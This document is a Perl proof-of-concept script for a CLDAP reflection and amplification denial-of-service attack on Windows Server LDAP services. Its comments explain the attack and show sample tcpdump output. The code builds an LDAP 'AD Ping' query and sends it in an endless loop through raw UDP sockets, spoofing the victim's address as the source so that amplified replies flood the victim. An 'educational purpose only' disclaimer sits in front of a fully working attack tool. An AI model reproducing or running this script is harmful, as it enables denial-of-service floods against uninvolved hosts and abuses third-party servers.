#!/usr/bin/perl##MS Windows Server 2008/2008 R2/ 2012/2012 R2/ AD LDAP RootDSE Netlogon #(CLDAP "AD Ping") query reflection DoS PoC##Copyright 2016 (c) Todor Donev#Varna, Bulgaria#todor.donev@gmail.com#https://www.ethical-hacker.org/#https://www.facebook.com/ethicalhackerorg#http://pastebin.com/u/hackerscommunity ##MS Windows Server 2016 [NOT TESTED !!!]# #Description:#The attackersends a simple query to a vulnerable reflector #supporting the Connectionless LDAP service (CLDAP) and using #address spoofing makes it appear to originate from the intended #victim. The CLDAP service responds to the spoofed address, #sending unwanted network traffic to the attacker’s intended target.# #Amplification techniques allow bad actors to intensify the size #of their attacks, because the responses generated by the LDAP #servers are much larger than the attacker’s queries. In this case, #the LDAP service responses are capable of reaching very high #bandwidth and we have seen an average amplification factor of #46x and a peak of 55x.###Disclaimer:#This or previous program is for Educational purpose ONLY. Do not #use it without permission. The usual disclaimer applies, especially #the fact that Todor Donev is not liable for any damages caused by #direct or indirect use of the information or functionality provided #by these programs. The author or any Internet provider bears NO #responsibility for content or misuse of these programs or any #derivatives thereof. By using these programs you accept the fact#that any damage (dataloss, system crash, system compromise, etc.) #caused by the use of these programs is not Todor Donev's #responsibility.##Use at your own risk and educational#purpose ONLY!##See also, UDP-based Amplification Attacks:#https://www.us-cert.gov/ncas/alerts/TA14-017A#### perl cldapdrdos.pl 192.168.1.112 192.168.1.146#[ MS Windows Server 2008/2008 R2/ 2012/2012 R2/ AD LDAP RootDSE Netlogon (CLDAP "AD Ping") query reflection DoS PoC#[ ======#[ Usg: cldapdrdos.pl <ldap server> <target> <port>#[ Default port: 389#[ Example: perl cldapdrdos.pl 192.168.30.56 192.168.1.1#[ ======#[ <todor.donev@gmail.com> Todor Donev#[ Facebook: https://www.facebook.com/ethicalhackerorg#[ Website: https://www.ethical-hacker.org/#[ Sending CLDAP "AD Ping" packets..#^C## tcpdump -i eth0 -c4 port 389#tcpdump: verbose output suppressed, use -v or -vv for full protocol decode#listening on eth0, link-type EN10MB (Ethernet), capture size 65535 bytes#00:00:58.638466 IP attacker.31337 > target.ldap: UDP, length 57#00:00:58.639360 IP target.ldap > attacker.31337: UDP, length 2315## LOOOL...#00:00:59.039293 IP attacker.31337 > target.ldap: UDP, length 57#00:00:59.041043 IP target.ldap > attacker.31337: UDP, length 2315## LOOOL...#4 packets captured#6 packets received by filter#0 packets dropped by kernel###
use Net::RawIP;
print "[ MS Windows Server 2008/2008 R2/ 2012/2012 R2/ AD LDAP RootDSE Netlogon (CLDAP \"AD Ping\") query reflection DoS PoC\n";
print "[ ======\n";
print "[ Usg: $0 <ldap server> <target> <port>\n";
print "[ Default port: 389\n";
print "[ Example: perl $0 192.168.30.56 192.168.1.1\n";
print "[ ======\n";
print "[ <todor.donev\@gmail.com> Todor Donev\n";
print "[ Facebook: https://www.facebook.com/ethicalhackerorg\n";
print "[ Website: https://www.ethical-hacker.org/\n";
my $cldap = $ARGV[0];
my $target= $ARGV[1];
my $port= $ARGV[2]||'389';
die "[ Error: Port must be between 1 and 65535!\n"if($port < 1 ||$port > 65535);
my $query= "\x30\x25\x02\x01\x01\x63\x20\x04\x00\x0a";$query.= "\x01\x00\x0a\x01\x00\x02\x01\x00\x02\x01";$query.= "\x00\x01\x01\x00\x87\x0b\x6f\x62\x6a\x65";$query.= "\x63\x74\x63\x6c\x61\x73\x73\x30\x00\x00";$query.= "\x00\x30\x84\x00\x00\x00\x0a\x04\x08\x4e";$query.= "\x65\x74\x6c\x6f\x67\x6f\x6e";
my $sock =new Net::RawIP({ udp => {}}) or die;
print "[ Sending CLDAP \"AD Ping\" packets..\n";while(){select(undef, undef, undef, 0.40);# Sleep 400 milliseconds$sock->set({ip =>{ saddr=> $target, daddr => $cldap},
udp =>{ source => 31337, dest=> $port,data => $query}});$sock->send;}
